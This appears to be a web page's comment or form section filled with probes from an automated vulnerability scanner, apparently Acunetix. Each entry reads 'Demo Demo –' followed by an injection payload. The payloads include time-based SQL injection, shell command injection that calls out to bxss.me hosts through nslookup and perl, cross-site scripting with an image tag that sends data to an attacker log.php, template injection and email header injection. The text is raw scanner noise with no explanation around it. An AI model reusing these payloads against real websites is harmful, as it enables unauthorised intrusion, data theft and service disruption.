“.gethostbyname(lc(“hityn”.”gnupdfagbc9c5.bxss.me.”)).”A”.chr(67).chr(hex(“58″)).chr(104).chr(82).chr(110).chr(66).”
Demo Demo –
acu4881<s1﹥s2ʺs3ʹuca4881
Demo Demo –
-5 OR 580=(SELECT 580 FROM PG_SLEEP(15))–
Demo Demo –
response.write(9681054*9039658)
Demo Demo –
echo qfbsse$()\ tltheb\nz^xyu||a #’ &echo qfbsse$()\ tltheb\nz^xyu||a #|” &echo qfbsse$()\ tltheb\nz^xyu||a #
Demo Demo –
acux3683z1z2abcxuca3683
Demo Demo –
‘+response.write(9681054*9039658)+’
Demo Demo –
&echo sueddm$()\ gbrbyz\nz^xyu||a #’ &echo sueddm$()\ gbrbyz\nz^xyu||a #|” &echo sueddm$()\ gbrbyz\nz^xyu||a #
Demo Demo –
|echo larfkd$()\ ucypsh\nz^xyu||a #’ |echo larfkd$()\ ucypsh\nz^xyu||a #|” |echo larfkd$()\ ucypsh\nz^xyu||a #
Demo Demo –
“+response.write(9681054*9039658)+”
Demo Demo –
Demo Demo –
NSKoxXee
Demo Demo –
(nslookup hitknvljuwyzvdfc07.bxss.me||perl -e “gethostbyname(‘hitknvljuwyzvdfc07.bxss.me’)”)
Demo Demo –
$(nslookup hitrtmjediwic3d023.bxss.me||perl -e “gethostbyname(‘hitrtmjediwic3d023.bxss.me’)”)
Demo Demo –
&(nslookup hitczjllrsdhg3e19a.bxss.me||perl -e “gethostbyname(‘hitczjllrsdhg3e19a.bxss.me’)”)&’\”`0&(nslookup hitczjllrsdhg3e19a.bxss.me||perl -e “gethostbyname(‘hitczjllrsdhg3e19a.bxss.me’)”)&`’
Demo Demo –
<th:t="${acx}#foreach
Demo Demo –
|(nslookup hitslcbgxnnlkf6022.bxss.me||perl -e “gethostbyname(‘hitslcbgxnnlkf6022.bxss.me’)”)
Demo Demo –
`(nslookup hitxfdvjbpszu5faf3.bxss.me||perl -e “gethostbyname(‘hitxfdvjbpszu5faf3.bxss.me’)”)`
Demo Demo –
<!–
Demo Demo –
;(nslookup hitvztndfyycee1465.bxss.me||perl -e “gethostbyname(‘hitvztndfyycee1465.bxss.me’)”)|(nslookup hitvztndfyycee1465.bxss.me||perl -e “gethostbyname(‘hitvztndfyycee1465.bxss.me’)”)&(nslookup hitvztndfyycee1465.bxss.me||perl -e “gethostbyname(‘hitvztndfyycee1465.bxss.me’)”)
Demo Demo –
1}}”}}’}}1%>”%>’%>
Demo Demo –
555′”()&%JRYV(9766)
Demo Demo –
555&n900171=v923815
Demo Demo –
555
bcc:[email protected]
Demo Demo –
‘”()&%JRYV(9050)
Demo Demo –
[email protected]>
bcc:[email protected]
Demo Demo –
555RIHc(9599)
Demo Demo –
5559356326
Demo Demo –
555UO2LR[!+!]
Demo Demo –
NCkoZouj
Demo Demo –
acu4916<s1﹥s2ʺs3ʹuca4916
Demo Demo –
555
Demo Demo –
${9999703+10000397}
Demo Demo –
1*555
Demo Demo –
-5) OR 892=(SELECT 892 FROM PG_SLEEP(15))–
Demo Demo –
555RIHc(9095)
Demo Demo –
acux8287z1z2abcxuca8287
Demo Demo –
555*652*647*0
Demo Demo –
(1212-652-5)
Demo Demo –
“+”A”.concat(70-3).concat(22*4).concat(113).concat(72).concat(114).concat(89)+(require”socket”
Socket.gethostbyname(“hitax”+”jdqeybef2aa81.bxss.me.”)[3].to_s)+”
Demo Demo –
555<ScRIpT>RIHc(9484)</sCrIpT>
Demo Demo –
!(()&&!|*|*|
Demo Demo –
‘+’A’.concat(70-3).concat(22*4).concat(112).concat(81).concat(116).concat(82)+(require’socket’
Socket.gethostbyname(‘hitrz’+’ignrhbqa21bdd.bxss.me.’)[3].to_s)+’
Demo Demo –
555*76*71*0
Demo Demo –
Demo Demo –
555RIHc(9034)
Demo Demo –
(636-76-5)
Demo Demo –
555*242*237*0
Demo Demo –
555
Demo Demo –
<th:t="${acx}#foreach
Demo Demo –
(802-242-5)
Demo Demo –
-1 OR 2+160-160-1=0+0+0+1
Demo Demo –
555RIHc(9397)
Demo Demo –
-1 OR 3+160-160-1=0+0+0+1
Demo Demo –
1}}”}}’}}1%>”%>’%>
Demo Demo –
555
Demo Demo –
555
Demo Demo –
555
Demo Demo –
-1)) OR 736=(SELECT 736 FROM PG_SLEEP(15))–
Demo Demo –
acu2340<s1﹥s2ʺs3ʹuca2340
Demo Demo –
555
Demo Demo –
acux4243z1z2abcxuca4243
Demo Demo –
555
Demo Demo –
Demo Demo –
555
Demo Demo –
<th:t="${acx}#foreach
Demo Demo –
555″ onerror=alert(9450)>
Demo Demo –
%35%35%35%3C%53%63%52%69%50%74%20%3E%52%49%48%63%289432%29%3C%2F%73%43%72%69%70%54%3E
Demo Demo –
1}}”}}’}}1%>”%>’%>
Demo Demo –
4MLdGkZj
Demo Demo –
555\u003CScRiPt\RIHc(9969)\u003C/sCripT\u003E
Demo Demo –
555*105*100*0
Demo Demo –
‘.gethostbyname(lc(‘hitdk’.’kdyvesqh199c6.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(100).chr(67).chr(114).chr(84).’
Demo Demo –
555<ScRiPt>RIHc(9607)</sCripT>
Demo Demo –
(665-105-5)
Demo Demo –
“.gethostbyname(lc(“hitev”.”fgqcipth4dd98.bxss.me.”)).”A”.chr(67).chr(hex(“58″)).chr(101).chr(65).chr(97).chr(73).”
Demo Demo –
555*246*241*0
Demo Demo –
555JRYV(9238)
Demo Demo –
(806-246-5)
Demo Demo –
555
Demo Demo –
FKlGUGdC’ OR 336=(SELECT 336 FROM PG_SLEEP(15))–
Demo Demo –
5554KURJ[!+!]
Demo Demo –
555*887*882*0
Demo Demo –
Demo Demo –
(1447-887-5)
Demo Demo –
555JRYV(9918)
Demo Demo –
555*625*620*0
Demo Demo –
Demo Demo –
(1185-625-5)
Demo Demo –
555<ScRIpT>JRYV(9838)</sCrIpT>
Demo Demo –
-1 OR 2+146-146-1=0+0+0+1
Demo Demo –
Demo Demo –
-1 OR 3+146-146-1=0+0+0+1
Demo Demo –
555JRYV(9288)
Demo Demo –
Demo Demo –
555
Demo Demo –
Demo Demo –
555JRYV(9352)
Demo Demo –
Demo Demo –
response.write(9590516*9442072)
Demo Demo –
555
Demo Demo –
‘+response.write(9590516*9442072)+’
Demo Demo –
echo euifym$()\ mrrtqy\nz^xyu||a #’ &echo euifym$()\ mrrtqy\nz^xyu||a #|” &echo euifym$()\ mrrtqy\nz^xyu||a #
Demo Demo –
7YbTKHFj
Demo Demo –
“+response.write(9590516*9442072)+”
Demo Demo –
&echo etgogy$()\ ggbnxj\nz^xyu||a #’ &echo etgogy$()\ ggbnxj\nz^xyu||a #|” &echo etgogy$()\ ggbnxj\nz^xyu||a #
Demo Demo –
Demo Demo –
555
Demo Demo –
|echo ykkcvv$()\ ldqcrw\nz^xyu||a #’ |echo ykkcvv$()\ ldqcrw\nz^xyu||a #|” |echo ykkcvv$()\ ldqcrw\nz^xyu||a #
Demo Demo –
(nslookup hithwilhnemsaefb06.bxss.me||perl -e “gethostbyname(‘hithwilhnemsaefb06.bxss.me’)”)
Demo Demo –
Demo Demo –
$(nslookup hithrctnvrygp3cf1a.bxss.me||perl -e “gethostbyname(‘hithrctnvrygp3cf1a.bxss.me’)”)
Demo Demo –
555
Demo Demo –
&(nslookup hitahoffatinu8103e.bxss.me||perl -e “gethostbyname(‘hitahoffatinu8103e.bxss.me’)”)&’\”`0&(nslookup hitahoffatinu8103e.bxss.me||perl -e “gethostbyname(‘hitahoffatinu8103e.bxss.me’)”)&`’
Demo Demo –
Qu4xueeU’) OR 425=(SELECT 425 FROM PG_SLEEP(15))–
Demo Demo –
|(nslookup hitvfxmvxecbbf04cc.bxss.me||perl -e “gethostbyname(‘hitvfxmvxecbbf04cc.bxss.me’)”)
Demo Demo –
<!–
Demo Demo –
555}body{acu:Expre/**/SSion(RIHc(9090))}
Demo Demo –
`(nslookup hitfybzexasbda0208.bxss.me||perl -e “gethostbyname(‘hitfybzexasbda0208.bxss.me’)”)`
Demo Demo –
555
Demo Demo –
;(nslookup hitmhvikxmmmr9d299.bxss.me||perl -e “gethostbyname(‘hitmhvikxmmmr9d299.bxss.me’)”)|(nslookup hitmhvikxmmmr9d299.bxss.me||perl -e “gethostbyname(‘hitmhvikxmmmr9d299.bxss.me’)”)&(nslookup hitmhvikxmmmr9d299.bxss.me||perl -e “gethostbyname(‘hitmhvikxmmmr9d299.bxss.me’)”)
Demo Demo –
555′”()&%JYub(9287)
Demo Demo –
555N6LxC
RIHc(9706)
Demo Demo –
555
Demo Demo –
‘”()&%JYub(9311)
Demo Demo –
555VMNUX[!+!]
Demo Demo –
555&n935942=v958626
Demo Demo –
555
Demo Demo –
555
bcc:[email protected]
Demo Demo –
5559357986
Demo Demo –
555
Demo Demo –
[email protected]>
bcc:[email protected]
Demo Demo –
555″ onerror=alert(9809)>
Demo Demo –
555
Demo Demo –
acu9650<s1﹥s2ʺs3ʹuca9650
Demo Demo –
555
Demo Demo –
%35%35%35%3C%53%63%52%69%50%74%20%3E%4A%52%59%56%289256%29%3C%2F%73%43%72%69%70%54%3E
Demo Demo –
555<img sRc='http://attacker-9653/log.php?
Demo Demo –
acux2176z1z2abcxuca2176
Demo Demo –
555\u003CScRiPt\JRYV(9309)\u003C/sCripT\u003E
Demo Demo –
${9999446+9999671}
Demo Demo –
555<a6YmbUH<
Demo Demo –
!(()&&!|*|*|
Demo Demo –
555<ScRiPt>JRYV(9706)</sCripT>
Demo Demo –
Demo Demo –
5559630″();}]9774
Demo Demo –
UolHGoQd’)) OR 126=(SELECT 126 FROM PG_SLEEP(15))–
Demo Demo –
555
Demo Demo –
%35%35%35%39%38%31%36%22%28%29%3B%7D%5D%39%39%34%35
Demo Demo –
<th:t="${acx}#foreach
Demo Demo –
Demo Demo –
555RIHc(9438)
Demo Demo –
“+”A”.concat(70-3).concat(22*4).concat(99).concat(81).concat(108).concat(77)+(require”socket”
Socket.gethostbyname(“hitrk”+”iahvyjgsc21eb.bxss.me.”)[3].to_s)+”
Demo Demo –
1}}”}}’}}1%>”%>’%>
Demo Demo –
‘+’A’.concat(70-3).concat(22*4).concat(117).concat(80).concat(99).concat(83)+(require’socket’
Socket.gethostbyname(‘hitib’+’wcbfwadw11e6f.bxss.me.’)[3].to_s)+’
Demo Demo –
Demo Demo –
Demo Demo –
‘.gethostbyname(lc(‘hitrn’.’iyhozpwide2be.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(117).chr(68).chr(118).chr(76).’
Demo Demo –
Demo Demo –
“.gethostbyname(lc(“hitxx”.”xiypacawc4b3a.bxss.me.”)).”A”.chr(67).chr(hex(“58″)).chr(111).chr(75).chr(99).chr(82).”
Demo Demo –
acu3646<s1﹥s2ʺs3ʹuca3646
Demo Demo –
Demo Demo –
acux8041z1z2abcxuca8041
Demo Demo –
Demo Demo –
Demo Demo –
Demo Demo –
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
Demo Demo –
<th:t="${acx}#foreach
Demo Demo –
Demo Demo –
1}}”}}’}}1%>”%>’%>
Demo Demo –
555}body{acu:Expre/**/SSion(JRYV(9332))}
Demo Demo –
555C27G1
JRYV(9796)
Demo Demo –
555CCSYF[!+!]
Demo Demo –
izg9R6rl
Demo Demo –
555JYub(9523)
Demo Demo –
555*16*11*0
Demo Demo –
555
Demo Demo –
555ERPYC[!+!]
Demo Demo –
(576-16-5)
Demo Demo –
555
Demo Demo –
555*377*372*0
Demo Demo –
555JYub(9731)
Demo Demo –
(937-377-5)
Demo Demo –
555<img sRc='http://attacker-9404/log.php?
Demo Demo –
555*504*499*0
Demo Demo –
555<ScRIpT>JYub(9563)</sCrIpT>
Demo Demo –
(1064-504-5)
Demo Demo –
1’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
Demo Demo –
555<a62dLYv<
Demo Demo –
555*951*946*0
Demo Demo –
1′”
Demo Demo –
555JYub(9651)
Demo Demo –
(1511-951-5)
Demo Demo –
1%2527%2522
Demo Demo –
-1 OR 2+626-626-1=0+0+0+1
Demo Demo –
@@m3hsJ
Demo Demo –
5559895″();}]9325
Demo Demo –
-1 OR 3+626-626-1=0+0+0+1
Demo Demo –
555
Demo Demo –
%35%35%35%39%38%37%39%22%28%29%3B%7D%5D%39%34%38%35
Demo Demo –
555JYub(9114)
Demo Demo –
555JRYV(9961)
Demo Demo –
555
Demo Demo –
555
Demo Demo –
555
Demo Demo –
555
Demo Demo –
555
Demo Demo –
555
Demo Demo –
555″ onerror=alert(9247)>
Demo Demo –
%35%35%35%3C%53%63%52%69%50%74%20%3E%4A%59%75%62%289497%29%3C%2F%73%43%72%69%70%54%3E
Demo Demo –
555\u003CScRiPt\JYub(9150)\u003C/sCripT\u003E
Demo Demo –
555<ScRiPt>JYub(9747)</sCripT>
Demo Demo –
555
Demo Demo –
Demo Demo –
Demo Demo –
Demo Demo –
Demo Demo –
BEp3SIzn’; waitfor delay ‘0:0:15’ —
Demo Demo –
Demo Demo –
Demo Demo –
Demo Demo –
Demo Demo –
555}body{acu:Expre/**/SSion(JYub(9339))}
Demo Demo –
555TyYe8
JYub(9565)
Demo Demo –
555HXOXT[!+!]
Demo Demo –
-5 OR 786=(SELECT 786 FROM PG_SLEEP(15))–
Demo Demo –
555
Demo Demo –
555
Demo Demo –
555<img sRc='http://attacker-9969/log.php?
Demo Demo –
555<a8h4fIk<
Demo Demo –
XjsdOcMF’; waitfor delay ‘0:0:15’ —
Demo Demo –
5559771″();}]9720
Demo Demo –
%35%35%35%39%39%31%38%22%28%29%3B%7D%5D%39%31%31%31
Demo Demo –
-5) OR 624=(SELECT 624 FROM PG_SLEEP(15))–
Demo Demo –
555JYub(9203)
Demo Demo –
-5 OR 209=(SELECT 209 FROM PG_SLEEP(15))–
Demo Demo –
-1)) OR 674=(SELECT 674 FROM PG_SLEEP(15))–
Demo Demo –
-5) OR 267=(SELECT 267 FROM PG_SLEEP(15))–
Demo Demo –
6sKvBgni’ OR 970=(SELECT 970 FROM PG_SLEEP(15))–
Demo Demo –
-1)) OR 245=(SELECT 245 FROM PG_SLEEP(15))–
Demo Demo –
HovPvyp9′) OR 56=(SELECT 56 FROM PG_SLEEP(15))–